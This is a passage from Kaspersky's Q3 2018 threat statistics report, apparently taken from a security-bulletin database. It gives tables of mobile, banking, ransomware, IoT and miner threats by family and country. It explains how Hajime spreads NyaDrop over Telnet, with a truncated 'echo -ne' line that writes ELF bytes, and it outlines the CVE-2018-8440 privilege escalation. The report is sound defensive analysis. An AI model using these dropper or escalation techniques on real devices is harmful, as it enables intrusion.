affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable. \n\n### Mobile threat statistics\n\nIn Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 less packages than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)\n\n#### Distribution of detected mobile apps by type\n\nAmong all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.\n\n_Distribution of newly detected mobile apps by type, Q2 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)\n\nSecond place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.\n\nThe share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).\n\nThe statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.\n\n**TOP 20 mobile malware**\n\n| Verdicts* | %** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 55.85 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.39 \n3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 \n4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 \n5 | Trojan.AndroidOS.Piom.toe | 3.23 \n6 | Trojan.AndroidOS.Dvmap.a | 3.12 \n7 | Trojan.AndroidOS.Triada.dl | 3.09 \n8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 \n10 | Trojan.AndroidOS.Agent.rt | 2,74 \n11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 \n12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 \n13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 \n14 | Trojan-Dropper.AndroidOS.Agent.ii | 1,77 \n15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 \n16 | Trojan.AndroidOS.Agent.pac | 1.61 \n17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 \n18 | Exploit.AndroidOS.Lotoor.be | 1.55 \n19 | Trojan.AndroidOS.Piom.uwp | 1.48 \n20 | Trojan.AndroidOS.Piom.udo | 1.36 \n \n_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._ \n_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nFirst place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>)..\n\nThird and fourth places went to representatives of the Asacub mobile banker family \u2013 Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).\n\n#### Geography of mobile threats\n\n_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware:**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 35.91 \n2 | Nigeria | 28.54 \n3 | Iran | 28.07 \n4 | Tanzania | 28.03 \n5 | China | 25.61 \n6 | India | 25.25 \n7 | Pakistan | 25.08 \n8 | Indonesia | 25.02 \n9 | Philippines | 23.07 \n10 | Algeria | 22.88 \n| | \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.\n\n### Mobile banking Trojans\n\nDuring the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018. \n\nThe largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 \n3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 \n4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 \n5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 \n6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 \n7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 \n8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 \n9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 \n10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nIn Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.\n\n_Geography of mobile banking threats, Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 2.18 \n2 | South Africa | 2.16 \n3 | Malaysia | 0.53 \n4 | Ukraine | 0.41 \n5 | Australia | 0.39 \n6 | China | 0.35 \n7 | South Korea | 0.33 \n8 | Tajikistan | 0.30 \n9 | USA | 0.27 \n10 | Poland | 0.25 \n| | \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.\n\n### Mobile ransomware Trojans\n\nIn Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 \n3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 \n4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 \n5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 \n8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 \n9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nIn Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family \u2013 Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.\n\n_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | USA | 1.73 \n2 | Kazakhstan | 0.36 \n3 | China | 0.14 \n4 | Italy | 0.12 \n5 | Iran | 0.11 \n6 | Belgium | 0.10 \n7 | Switzerland | 0.09 \n8 | Poland | 0.09 \n9 | Mexico | 0.09 \n10 | Romania | 0.08 \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nJust like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.\n\n## Attacks on IoT devices\n\nIn this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types. \n \nTelnet | 99,4% \nSSH | 0,6% \n \n_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_\n\n### Telnet attacks\n\n_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)\n\n**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**\n\n| Country | %* \n---|---|--- \n1 | China | 27.15% \n2 | Brazil | 10.57% \n3 | Russia | 7.87% \n4 | Egypt | 7.43% \n5 | USA | 4.47% \n6 | South Korea | 3.57% \n7 | India | 2.59% \n8 | Taiwan | 2.17% \n9 | Turkey | 1.82% \n10 | Italy | 1.75% \n \n_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._\n\nIn Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.\n\nSuccessful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn't require any utilities \u2013 it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.\n\nIt was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:\n\n 1. After successfully infecting a device, Hajime scans the network to find new victims.\n 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.\n 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.\n\nAll these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:\n \n \n echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\n\n480 bytes can be sent this way, but sending 60 KB becomes problematic.\n\n**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% \n2 | Backdoor.Linux.Mirai.ba | 16.31% \n3 | Backdoor.Linux.Mirai.b | 12.01% \n4 | Trojan-Downloader.Shell.Agent.p | 1.53% \n5 | Backdoor.Linux.Mirai.c | 1.33% \n6 | Backdoor.Linux.Gafgyt.ay | 1.15% \n7 | Backdoor.Linux.Mirai.au | 0.83% \n8 | Backdoor.Linux.Gafgyt.bj | 0.61% \n9 | Trojan-Downloader.Linux.Mirai.d | 0.51% \n10 | Backdoor.Linux.Mirai.bj | 0.37% \n \n_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._\n\nThe rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.\n\n## Financial threats\n\n### Q3 events\n\nThe banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&amp;C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.\n\nTo recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body.\n\n### Financial threat statistics\n\nIn Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.\n\n_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Germany | 3.0 \n2 | South Korea | 2.8 \n3 | Greece | 2.3 \n4 | Malaysia | 2.1 \n5 | Serbia | 2.0 \n6 | United Arab Emirates | 1.9 \n7 | Portugal | 1.9 \n8 | Lithuania | 1.9 \n9 | Indonesia | 1.8 \n10 | Cambodia | 1.8 \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 25.8 | \n2 | Nymaim | Trojan.Win32.Nymaim | 18.4 | \n3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 | \n4 | RTM | Trojan-Banker.Win32.RTM | 9.2 | \n5 | Emotet | Backdoor.Win32.Emotet | 5.9 | \n6 | Neurevt | Trojan.Win32.Neurevt | 4.7 | \n7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 | \n8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 | \n9 | Gozi | Trojan.Win32. Gozi | 1.6 | \n10 | Trickster | Trojan.Win32.Trickster | 1.4 | \n \n_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._\n\nIn Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.\n\nOverall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground \u2013 from 27% in Q2 to 18.4% in Q3 \u2013 and fell to second.\n\n## Cryptoware programs\n\n### Q3 events\n\nIn early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.\n\nAugust saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios \u2013 via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% | \n8 | Shade | Trojan-Ransom.Win32.Shade | 1,99% | \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% | \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% | \n| | | | | \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications. _\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Afghanistan | 16.85% \n2 | Uzbekistan | 14.23% \n3 | Kazakhstan | 10.17% \n4 | Belarus | 9.73% \n5 | Vietnam | 8.96% \n6 | Indonesia | 8.80% \n7 | Mozambique | 8.50% \n8 | Ukraine | 7.60% \n9 | Tanzania | 7.51% \n10 | Azerbaijan | 7.13% \n \n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Venezuela | 35.88 \n2 | Albania | 32.48 \n3 | Algeria | 32.41 \n4 | Belarus | 31.08 \n5 | Armenia | 29.16 \n6 | Ukraine | 28.67 \n7 | Moldova | 28.64 \n8 | Azerbaijan | 26.67 \n9 | Kyrgyzstan | 25.80 \n10 | Serbia | 25.38 \n11 | Mauritania | 24.89 \n12 | Indonesia | 24.68 \n13 | Romania | 24.56 \n14 | Qatar | 23.99 \n15 | Kazakhstan | 23.93 \n16 | Philippines | 23.84 \n17 | Lithuania | 23.70 \n18 | Djibouti | 23.70 \n19 | Latvia | 23.09 \n20 | Honduras | 22.97 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Uzbekistan | 54.93 \n2 | Afghanistan | 54.15 \n3 | Yemen | 52.12 \n4 | Turkmenistan | 49.61 \n5 | Tajikistan | 49.05 \n6 | Laos | 47.93 \n7 | Syria | 47.45 \n8 | Vietnam | 46.07 \n9 | Bangladesh | 45.93 \n10 | Sudan | 45.30 \n11 | Ethiopia | 45.17 \n12 | Myanmar | 44.61 \n13 | Mozambique | 42.65 \n14 | Kyrgyzstan | 42.38 \n15 | Iraq | 42.25 \n16 | Rwanda | 42.06 \n17 | Algeria | 41.95 \n18 | Cameroon | 40.98 \n19 | Malawi | 40.70 \n20 | Belarus | 40.66 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.\n\n_Geography of local malware attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.", "cvss3": {}, "published": "2018-11-12T10:00:55", "type": "securelist", "title": "IT threat evolution Q3 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-8373", "CVE-2018-8414", "CVE-2018-8440"], "modified": "2018-11-12T10:00:55", "id": "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "href": "https://securelist.com/it-threat-evolution-q3-2018-statistics/88689/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-04-06T10:30:44", "description": "\n\n## Introduction\n\nIn 